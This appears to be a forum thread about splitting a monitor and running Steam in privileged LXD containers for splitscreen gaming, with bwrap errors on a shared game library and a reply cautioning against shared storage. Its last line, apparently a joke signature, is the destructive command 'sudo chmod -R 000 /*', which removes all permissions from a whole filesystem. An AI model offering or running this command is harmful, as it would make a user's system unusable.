Creating a program to run steam games in splitscreen

Hi everyone,

I've had amazing luck at developing a method to run steam games in splitscreen (basically already got it to work, but needs much optimizing which is why I'm here).

So my goal is to create a linux program that will split a users desktop monitor into two, launch steam via LXC containers while pushing both usb and bluetooth controllers to specific containers to create a system of splitscreen gaming.

I'm taking this one step at a time. I can split my screen into two using fakexrandr (I wanted to use xrandrs virtual monitiors but unfortunately that doesn't work on ubuntus gnome).

I've created containers that are functional for keyboard and mouse (I haven't yet gotten to the usb and bluetooth controller stage) and run steam with vulkan at full speed. I used the snap version of LXD to get LXD version 4.0.11. When I install a game locally it will run fine, however I have also used:

<lxc config device add steam1 steamlibhdd disk source=/mnt/Big_Ubuntu/LinuxSteamLibrary path=/mnt/Big_Ubuntu/LinuxSteamLibrary>

so that I can save storage space. This works for lots of games, however lots of other games such as AoE2 DE and Halo do not run. The errors that steam seems to complain about are to do with bwrap. I believe fedora users are having a similar issue however I'm unable to follow along with their fixes. I don't believe this is a permissions issue as I run the containers as privileged containers, and have played with Idmaps.

Is there any sort of way to resolve this issue? I don't really want to download 60+ gigs of Halo to get it to work in splitscreen (although that is an option...)

Sharing the same storage across all instances of the game seems like a very bad idea... you don't know what files will be read or written at the same time.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*